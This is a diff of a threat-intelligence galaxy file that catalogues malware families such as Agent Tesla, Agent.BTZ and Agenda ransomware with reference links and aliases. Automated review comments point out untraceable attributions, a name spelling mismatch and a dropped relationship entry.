"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
- "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
+ "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
"http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf"
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn"
],
"synonyms": [
"HOMEUNIX",
@@ -11298,16 +11964,16 @@
"value": "Abaddon"
},
{
- "description": "",
+ "description": "MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos",
- "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/"
+ "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
+ "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/"
],
"synonyms": [
"PinkKite",
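Review bot: the new description for Abaddon POS opens with "MajorGeeks describes this malware as ...", but no MajorGeeks URL appears in the `refs` list that is rewritten in the same hunk, so the stated source is not traceable from the cluster itself. Either add the MajorGeeks page to `refs` or drop the attribution and keep the behavioural summary on its own, otherwise a consumer of the galaxy cannot verify where the `GetCurrentProcessId` detail comes from.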
@@ -11347,8 +12013,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader",
- "https://twitter.com/cocaman/status/1260069549069733888",
- "https://github.com/Tlgyt/AbSent-Loader"
+ "https://github.com/Tlgyt/AbSent-Loader",
+ "https://twitter.com/cocaman/status/1260069549069733888"
],
"synonyms": [],
"type": []
@@ -11374,10 +12040,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
"https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf"
],
"synonyms": [],
"type": []
@@ -11390,10 +12056,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://unit42.paloaltonetworks.com/acidbox-rare-malware/",
"https://www.epicturla.com/blog/acidbox-clustering",
- "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
+ "https://securelist.com/apt-trends-report-q2-2020/97937/"
],
"synonyms": [
"MagicScroll"
@@ -11433,8 +12099,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief",
- "https://github.com/LimerBoy/Adamantium-Thief",
- "https://twitter.com/ClearskySec/status/1377176015189929989"
+ "https://twitter.com/ClearskySec/status/1377176015189929989",
+ "https://github.com/LimerBoy/Adamantium-Thief"
],
"synonyms": [],
"type": []
@@ -11447,8 +12113,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016",
- "https://twitter.com/JaromirHorejsi/status/813712587997249536"
+ "https://twitter.com/JaromirHorejsi/status/813712587997249536",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016"
],
"synonyms": [],
"type": []
@@ -11487,8 +12153,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot",
- "https://www.bromium.com/second-stage-attack-analysis/",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot"
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot",
+ "https://www.bromium.com/second-stage-attack-analysis/"
],
"synonyms": [],
"type": []
@@ -11509,14 +12175,27 @@
"uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
"value": "Adylkuzz"
},
+ {
+ "description": "Ransomware written using .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aesrt",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fb0eb7a8-ab32-4371-96b7-2d19f9064ac5",
+ "value": "AESRT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita",
- "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md",
"https://twitter.com/_CPResearch_/status/1201957880909484033",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md"
+ "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html"
],
"synonyms": [],
"type": []
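Review bot: the new AESRT entry has `"value": "AESRT"` and a Malpedia slug of `win.aesrt`, while the Fortinet reference path reads `...new-vohuk-scarecrow-and-aerst-variants` (the letters "s" and "r" are transposed). Worth confirming before merge that this is the vendor's own spelling of the same family and not a typo carried into the cluster name or the URL, since name mismatches make the alias harder to match later.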
@@ -11529,13 +12208,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt",
+ "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
"https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt",
+ "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
],
"synonyms": [
- "Agenda"
+ "Agenda",
+ "Qilin"
],
"type": []
},
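Review bot: the added synonym `"Qilin"` is not reflected in any of the listed reference URLs (none of the slugs mention Qilin), so a reader cannot tell from the cluster which report establishes the alias. Suggest adding the reference that documents the Agenda/Qilin naming, and checking that no other cluster already uses "Qilin" as a `value` or synonym, because duplicate aliases across clusters produce ambiguous matches in MISP.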
@@ -11547,29 +12228,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
- "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d",
- "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
- "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
- "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
+ "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
- "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://artemonsecurity.com/snake_whitepaper.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
+ "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/",
+ "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
+ "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d"
],
"synonyms": [
"ComRAT",
@@ -11578,15 +12263,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "da079741-05e6-458c-b434-011263dc691c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"value": "Agent.BTZ"
},
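Review bot: the `related` block linking Agent.BTZ to `dest-uuid` `da079741-05e6-458c-b434-011263dc691c` with `type: similar` is removed outright, and nothing in the hunk replaces it. If the relationship is now expressed elsewhere or is intentionally dropped, the commit message should say so; if it is a side effect of the generator no longer emitting `related`, this is silent data loss in the galaxy and should be fixed in the generator rather than merged.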
@@ -11595,117 +12271,135 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
- "https://inquest.net/blog/2021/11/02/adults-only-malware-lures",
- "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/",
- "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
- "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://blog.netlab.360.com/purecrypter",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/",
- "https://youtu.be/BM38OshcozE",
- "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://youtu.be/hxaeWyK8gMI",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://isc.sans.edu/diary/27666",
+ "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/",
+ "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
+ "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
+ "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/",
+ "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://inquest.net/blog/2021/11/02/adults-only-malware-lures",
+ "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
+ "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
+ "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
+ "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor",
+ "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
+ "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html",
+ "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
+ "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "https://blog.malwarelab.pl/posts/basfu_aggah/",
+ "https://community.riskiq.com/article/40000d46",
+ "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://community.riskiq.com/article/6337984e",
+ "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/",
+ "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
+ "https://youtu.be/QQuRp7Qiuzg",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.telsy.com/download/4832/",
+ "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
+ "https://community.riskiq.com/article/56e28880",
+ "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354",
"https://guillaumeorlando.github.io/AgentTesla",
- "https://cert.gov.ua/article/861292",
- "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://asec.ahnlab.com/ko/29133/",
+ "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
+ "https://malwarebookreports.com/agent-teslaggah/",
+ "https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
"https://www.inde.nz/blog/inside-agenttesla",
"https://isc.sans.edu/diary/rss/28190",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
- "https://community.riskiq.com/article/56e28880",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
+ "https://youtu.be/hxaeWyK8gMI",
"http://blog.nsfocus.net/sweed-611/",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
- "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
- "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
- "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
- "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
- "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://unit42.paloaltonetworks.com/originlogger/",
- "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
- "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
- "https://isc.sans.edu/diary/28202",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://community.riskiq.com/article/6337984e",
- "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
+ "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
"https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
+ "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
+ "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://isc.sans.edu/diary/rss/27092",
"https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
- "https://malwarebookreports.com/agent-teslaggah/",
- "https://blog.minerva-labs.com/preventing-agenttesla",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
- "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor",
- "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
- "https://twitter.com/MsftSecIntel/status/1392219299696152578",
- "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
- "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
- "https://blog.malwarelab.pl/posts/basfu_aggah/",
- "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
"https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf",
- "https://www.telsy.com/download/4832/",
- "https://youtu.be/QQuRp7Qiuzg",
- "https://asec.ahnlab.com/ko/29133/",
- "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
"https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
- "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
"https://isc.sans.edu/diary/27088",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
- "https://community.riskiq.com/article/40000d46",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware",
- "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/",
- "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
+ "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
+ "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
